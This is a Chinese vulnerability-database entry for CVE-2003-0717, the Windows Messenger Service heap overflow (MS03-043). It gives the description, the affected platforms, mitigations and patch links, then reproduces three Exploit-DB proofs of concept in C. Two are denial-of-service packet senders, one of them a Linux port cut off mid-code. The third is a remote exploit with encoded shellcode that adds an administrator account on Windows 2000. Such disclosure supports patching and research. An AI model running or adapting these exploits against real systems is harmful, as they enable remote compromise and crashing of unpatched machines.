CVE-2003-0717
CVSS7.5
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:36:49
NMCOES    

[原文]The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack.


[CNNVD]Microsoft Windows Messenger服务远程堆溢出漏洞(MS03-043/KB828035)(CNNVD-200311-085)

        
        Microsoft Windows是微软开发的视窗操作系统,Windows Messenger服务用于服务器与客户端之间互相发送一些短消息。
        Microsoft Windows Messenger服务存在堆溢出问题,远程攻击者可以利用这个漏洞以系统权限在目标机器上执行任意指令。
        问题存在于Messenger服务程序的search-by-name函数中,攻击者提交特定序列的字符串给这个函数可造成堆溢出,精心构建提交数据可能以系统权限在目标机器上执行任意指令。
        消息通过NetBIOS或者RPC提交给消息服务,因此可以通过封闭NETBIOS端口(137-139)和使用防火墙过滤UDP广播包来阻挡此类消息。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstationMicrosoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_nt:4.0:sp5:serverMicrosoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:serverMicrosoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:serverMicrosoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_nt:4.0:sp4:serverMicrosoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_nt:4.0:sp1:serverMicrosoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:serverMicrosoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:workstationMicrosoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6:workstationMicrosoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstationMicrosoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_nt:4.0:sp4:workstationMicrosoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstationMicrosoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstationMicrosoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_meMicrosoft Windows ME
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:268Windows XP Messenger Service Buffer Overflow
oval:org.mitre.oval:def:213Windows 2000 Messenger Service Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0717
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0717
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-085
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106666713812158&w=2
(UNKNOWN)  BUGTRAQ  20031018 Proof of concept for Windows Messenger Service overflow
http://marc.info/?l=ntbugtraq&m=106632188709562&w=2
(UNKNOWN)  BUGTRAQ  20031016 MS03-043 Popup Messenger Servce buffer-overflow
http://www.cert.org/advisories/CA-2003-27.html
(UNKNOWN)  CERT  CA-2003-27
http://www.kb.cert.org/vuls/id/575892
(VENDOR_ADVISORY)  CERT-VN  VU#575892
http://www.microsoft.com/technet/security/bulletin/ms03-043.asp
(VENDOR_ADVISORY)  MS  MS03-043
http://www.securityfocus.com/bid/8826
(VENDOR_ADVISORY)  BID  8826

- 漏洞信息

Microsoft Windows Messenger服务远程堆溢出漏洞(MS03-043/KB828035)
高危 边界条件错误
2003-11-17 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Windows是微软开发的视窗操作系统,Windows Messenger服务用于服务器与客户端之间互相发送一些短消息。
        Microsoft Windows Messenger服务存在堆溢出问题,远程攻击者可以利用这个漏洞以系统权限在目标机器上执行任意指令。
        问题存在于Messenger服务程序的search-by-name函数中,攻击者提交特定序列的字符串给这个函数可造成堆溢出,精心构建提交数据可能以系统权限在目标机器上执行任意指令。
        消息通过NetBIOS或者RPC提交给消息服务,因此可以通过封闭NETBIOS端口(137-139)和使用防火墙过滤UDP广播包来阻挡此类消息。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在边界防火墙或者个人防火墙上禁止不可信主机访问NETBIOS和RPC端口135、137、139(TCP/UDP)
        * 禁用Messenger服务。
        打开"开始" ,(或打开"设置")点击"控制面板",然后双击"管理工具",双击"服务",找到并双击"Messenger", 在"启动类型"的下拉框中选择"已禁用",然后点击"停止",然后点击"确定"。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-043)以及相应补丁:
        MS03-043:Buffer Overrun in Messenger Service Could Allow Code Execution (828035)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-043.asp

        补丁下载:
        * Microsoft Windows NT Workstation 4.0, Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7597FCF4-6615-4074-9E46-A17D808ED38D&displaylang=en

        * Microsoft Windows NT Server 4.0, Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=B1949456-996A-485A-9A28-79FD79F26A1B&displaylang=en

        * Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=64AB4B66-1A6E-4264-93A8-26CDB98B05A8&displaylang=en

        * Microsoft Windows 2000, Service Pack 2
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=A0061377-1683-4C13-9527-5534F6C7CF85&displaylang=en

        * Microsoft Windows 2000, Service Pack 3, Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=99F1B40D-906A-4945-A021-4B494CCCBDE0&displaylang=en

        * Microsoft Windows XP Gold, Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=F02DA309-4B0A-4438-A0B9-5B67414C3833&displaylang=en

        * Microsoft Windows XP 64-bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=2BE95254-4C65-4CA5-80A5-55FDF5AA2296&displaylang=en

        * Microsoft Windows XP 64-bit Edition Version 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8B990946-84C8-4C91-899C-5A44EC13174E&displaylang=en

        * Microsoft Windows Server 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=1DF106F3-7EC4-4EB0-9143-C1E3C9E2F5F8&displaylang=en

        * Microsoft Windows Server 2003 64-bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8B990946-84C8-4C91-899C-5A44EC13174E&displaylang=en

- 漏洞信息 (111)

MS Windows Messenger Service Denial of Service Exploit (MS03-043) (EDBID:111)
windows dos
2003-10-18 Verified
0 LSD-PLaNET
N/A [点击下载]
/*

DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard.
Launching it one or two times against the target should make the 
machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does not 
properly validate the length of a message before passing it to the allocated 
buffer" according to MS bulletin. Digging into it a bit more, we find that when 
a character 0x14 in encountered in the 'body' part of the message, it is 
replaced by a CR+LF. The buffer allocated for this operation is twice the size 
of the string, which is the way to go, but is then copied to a buffer which 
was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks 
and overflow the fixed size buffer.

Credits go to LSD :)

*/

#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>

// Packet format found thanks to a bit a sniffing
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff" // @74 : fields length
"\x00\x00";

// Exploit downloaded on www.k-otik.com
unsigned char field_header[] =
"\xff\xff\xff\xff" // @0 : field length
"\x00\x00\x00\x00"
"\xff\xff\xff\xff"; // @8 : field length

int main(int argc,char *argv[])
{
	int i, packet_size, fields_size, s;
	unsigned char packet[8192];
	struct sockaddr_in addr;
	// A few conditions :
	// 0 <= strlen(from) + strlen(machine) <= 56
	// max fields size 3992
	char from[] = "RECCA";
	char machine[] = "ZEUS";
	char body[4096] = "*** MESSAGE ***";

	WSADATA wsaData;

	WSAStartup(0x0202, &wsaData);

	ZeroMemory(&addr, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr("192.168.186.3");
	addr.sin_port = htons(135);

	ZeroMemory(packet, sizeof(packet));
	packet_size = 0;

	memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 
1);
	packet_size += sizeof(packet_header) - 1;

	i = strlen(from) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], from);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	i = strlen(machine) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], machine);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 
3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
	memset(body, 0x14, sizeof(body));
	body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) 
- 1] = '\0';

	i = strlen(body) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], body);
	packet_size += i;

	fields_size = packet_size - (sizeof(packet_header) - 1);
	*(unsigned int *)(&packet[40]) = time(NULL);
	*(unsigned int *)(&packet[74]) = fields_size;

	fprintf(stdout, "Total length of strings = %d\nPacket size = 
%d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), 
packet_size, fields_size);

/*
	for (i = 0; i < packet_size; i++)
	{
		if (i && ((i & 1) == 0))
			fprintf(stdout, " ");
		if (i && ((i & 15) == 0))
			fprintf(stdout, "\n");
		fprintf(stdout, "%02x", packet[i]);
	}
	fprintf(stdout, "\n");
*/
	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
		exit(EXIT_FAILURE);

	if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, 
sizeof(addr)) == -1)
		exit(EXIT_FAILURE);
/*
	if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1)
		exit(EXIT_FAILURE);
*/

	exit(EXIT_SUCCESS);
}

// milw0rm.com [2003-10-18]
		

- 漏洞信息 (135)

MS Windows Messenger Service Remote Exploit FR (MS03-043) (EDBID:135)
windows remote
2003-12-16 Verified
135 MrNice
N/A [点击下载]
/*******************************************************************/
/*                [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]                      */
/*              ---------------------------------------------------------------                     */
/*                                                                                                                  */
/*               This Sploit use the unhandledexceptionfilter to redirect                      */
/*               the execution. When overflow occur we have :                                   */
/*                                                                                                                  */
/*               mov 	eax,esi+8		                                                    */
/*               mov 	ecx,esi+Ch                                                                     */
/*               mov 	dword ptr ds:[ecx],eax                                                     */
/*                                                                                                                  */
/*               so we control ecx and edx and we can write 4 bytes                            */
/*               where we want.                                                                              */
/*               If we try to write in a not writable memory zone, an                            */
/*               excepetion is lauched and unhandledexceptionfilter too.                     */
/*                    						     */
/*               A part of unhandledexceptionfilter :                                                 */
/*                                                                                                                  */
/*              mov	eax, dword_0_77ECF44C(=where)                                      */
/*		cmp	eax, ebx				     */
/*		jz	short loc_0_77EA734C                                      */
/*		push	esi                                                                 */
/*		call	eax                                                                */
/*							     */
/*               So we write the "WHAT"(=jmp esi+4Ch) at                                        */
/*               the "WHERE"(=77EA734C here) and when the exception occur             */
/*               the unhandledexceptionfilter is lauched so when call eax                    */
/*               occur, it execute our code.                                                              */ 
/*                       					                     */
/*               Thx Kotik who coded the proof of concept,and Metasploit                    */
/*               for Shellcode and last but not least kralor,Scurt from Crpt                   */
/*                                                                                                                  */
/*               Tested on win2k FR SP0                                                                 */
/*                                                                                                                  */
/*                                                                                                                  */
/*******************************************************************/

#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#endif
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc"
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x00\x00";


unsigned char field_header[] =
"\xff\xff\xff\xff"
"\x00\x00\x00\x00"
"\xff\xff\xff\xff";

unsigned char ShellCode[] = // XorDecode	23 bytes
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// AddUser:X Pass:X
"\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55"
"\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe"
"\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe"
"\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f"
"\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5"
"\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7"
"\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96"
"\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff"
"\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f"
"\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7"
"\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf"
"\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82"
"\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a"
"\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e"
"\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97"
"\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae"
"\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77"
"\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92"
"\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96";


int main(int argc,char *argv[])
{
	int i, packet_size, fields_size, s,sp;
	unsigned char packet[8192];
	struct sockaddr_in addr;
	// A few conditions :
	// 0 <= strlen(from) + strlen(machine) <= 56
	// max fields size 3992
	char from[] = "RECCA";
	char machine[] = "ZEUS";
	char body[4096] = "*** MESSAGE ***";
#ifdef _WIN32
	WSADATA wsaData;
#endif

	if(argc<2)
	   {
	printf("\t     [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n");
	printf("\t\t  www.coromputer.net && Undernet #coromputer\n");
                printf("---------------------------------------------------------------\n");
                printf("Tested on Windows 2000 French Sp0\n\n");
                printf("Downloaded from www.K-OTik.com\n");
                printf("Syntax : %s <ip>\n",argv[0]);
                return -1;
  	   }

#ifdef _WIN32
	if(WSAStartup(0x101,&wsaData)) {
		printf("error: unable to load winsock.\n");
                return -1;
		}
#endif

	memset(&addr,0x00,sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr(argv[1]);
	addr.sin_port = htons(135);

	memset(packet,0x00,sizeof(packet));
	packet_size = 0;

	memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
	packet_size += sizeof(packet_header) - 1;

	i = strlen(from) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], from);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	i = strlen(machine) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], machine);
	packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4

	printf("Max 'body' size (incl. terminal NULL char) = 
                %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header));
	memset(body, 0x14, sizeof(body));
	
	
	body[2263]=(char)0x90;
	body[2264]=(char)0x90;
	body[2265]=(char)0x90;
	body[2266]=(char)0x90;
	
	body[2267]=(char)0x90;
	body[2268]=(char)0x90;
	
	//jmp 8 bytes plus loing
	body[2269]=(char)0xeb;
	body[2270]=(char)0x08;
	
	//WHAT CRYPTSVC.dll Win2k sp0 FRENCH
	body[2271]=(char)0x48;
	body[2272]=(char)0x65;
	body[2273]=(char)0x87;
	body[2274]=(char)0x76;
	
	//WHERE win2k sp0 FRENCH
	body[2275]=(char)0x4C;
	body[2276]=(char)0xF4;
	body[2277]=(char)0xEC;
	body[2278]=(char)0x77;
	   
	for(i=2279;i<2606;i++)
		body[i]=ShellCode[i-2279];
	
	body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';

	i = strlen(body) + 1;
	*(unsigned int *)(&field_header[0]) = i;
	*(unsigned int *)(&field_header[8]) = i;
	memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
	packet_size += sizeof(field_header) - 1;
	strcpy(&packet[packet_size], body);
	packet_size += i;

	fields_size = packet_size - (sizeof(packet_header) - 1);
	*(unsigned int *)(&packet[40]) = time(NULL);
	*(unsigned int *)(&packet[74]) = fields_size;

	printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) 
                + strlen(machine) + strlen(body), packet_size, fields_size);


	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
		printf("error: unable to create socket\n");
		return -1;
		}

	if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
		printf("error: unable to send packet\n");
                return -1;
		}
	return 0;
}


// milw0rm.com [2003-12-16]
		

- 漏洞信息 (385)

MS Messenger Denial of Service Exploit (MS03-043) (linux ver) (EDBID:385)
windows dos
2004-08-08 Verified
0 VeNoMouS
N/A [点击下载]
/* 
Mon Oct 20 14:26:55 NZDT 2003 
  
Re-written By VeNoMouS to be ported to linux, and tidy it up a little. 
This was only like a 5 minute port but it works and has been tested. 
venomgen-x.co.nz <mailto:venomgen-x.co.nz> 
  
greets to str0ke and defy 
  


DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. 
Launching it one or two times against the target should make the 
machine reboot. Tested against a Win2K SP4. 
  
"The vulnerability results because the Messenger Service does not 
properly validate the length of a message before passing it to the allocated 
buffer" according to MS bulletin. Digging into it a bit more, we find that 
when 
  
a character 0x14 in encountered in the 'body' part of the message, it is 
replaced by a CR+LF. The buffer allocated for this operation is twice the 
size 
of the string, which is the way to go, but is then copied to a buffer which 
was only allocated 11CAh bytes. Thanks to that, we can bypass the length 
checks 
  
and overflow the fixed size buffer. 
  
Credits go to LSD :) 
  
*/ 
  
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <errno.h> 
#include <time.h> 
  
#include <sys/types.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 
  
  
  
  
  
// Packet format found thanks to a bit a sniffing 
static unsigned char packet_header[] = 
"\x04\x00\x28\x00" 
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" 
"\x4f\xb6\xe6\xfc" 
"\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? 
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff" 
"\xff\xff\xff\xff" 
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\xff\xff\xff\xff" 
"\xff\xff\xff\xff" // 74 : fields length 
"\x00\x00"; 
  
unsigned char field_header[] = 
"\xff\xff\xff\xff" // 0 : field length 
"\x00\x00\x00\x00" 
"\xff\xff\xff\xff"; // 8 : field length 
  


int usage(char *name) 
{ 
 printf("Proof of Concept for Windows Messenger Service Overflow..\n"); 
 printf("- Originally By Hanabishi Recca - reccamail.ru\n\n 
<mailto:reccamail.ru\n\n> "); 
 printf("- Ported to linux by VeNoMouS..\n"); 
 printf("- venomgen-x.co.nz\n\n\n <mailto:venomgen-x.co.nz\n\n\n> "); 
  
 printf("example : %s -d yourputtersux -i 10.33.10.4 -s 
n0nlameputer\n",name); 
 printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n"); 
 printf("-s <src netbios name>\n"); 
 return 1; 
} 
  


int main(int argc,char *argv[]) 
{ 
        int i, packet_size, fields_size, s; 
        unsigned char packet[8192]; 
        struct sockaddr_in addr; 
  char from[57],machine[57],c; 
        char body[4096] = "*** MESSAGE ***"; 
  
  if(argc <= 2) 
  { 
  usage(argv[0]); 
  exit(0); 
  } 
  
    while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) 
  switch(c) 
   { 
   case 'd': 
      strncpy(machine,optarg,sizeof(machine)); 
      printf("Machine is %s\n",machine); 
      break; 
   case 'i': 
            memset(&addr, 0,sizeof(addr)); 
            addr.sin_family = AF_INET; 
            addr.sin_addr.s_addr = inet_addr(optarg); 
            addr.sin_port = htons(135); 
      break; 
   case 's': 
            strncpy(from,optarg,sizeof(from)); 
      break; 
  
   case 'h': 
      usage(argv[0]); 
      exit(0); 
      break; 
   } 
       
        // A few conditions : 
        // 0 <= strlen(from) + strlen(machine) <= 56 
        // max fields size 3992 
  
  if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); 
exit(0); } 
  
        if(!strlen(machine)) { printf("Ummmm we also need the dest netbios 
name bro...\n"); exit(0); } 
  
  if(!strlen(from)) strcpy(from,"tolazytotype"); 
  
        memset(packet,0, sizeof(packet)); 
        packet_size = 0; 
  
        memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 
1); 
        packet_size += sizeof(packet_header) - 1; 
  
        i = strlen(from) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], from); 
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 
4 
  
        i = strlen(machine) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], machine); 
        packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 
4 
  
        fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 
3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); 
        memset(body, 0x14, sizeof(body)); 
        body[3992 - packet_size + sizeof(packet_header) - 
sizeof(field_header) - 1] = '\0'; 
  
        i = strlen(body) + 1; 
        *(unsigned int *)(&field_header[0]) = i; 
        *(unsigned int *)(&field_header[8]) = i; 
        memcpy(&packet[packet_size], field_header, sizeof(field_header) - 
1); 
        packet_size += sizeof(field_header) - 1; 
        strcpy(&packet[packet_size], body); 
        packet_size += i; 
  
        fields_size = packet_size - (sizeof(packet_header) - 1); 
        *(unsigned int *)(&packet[40]) = time(NULL); 
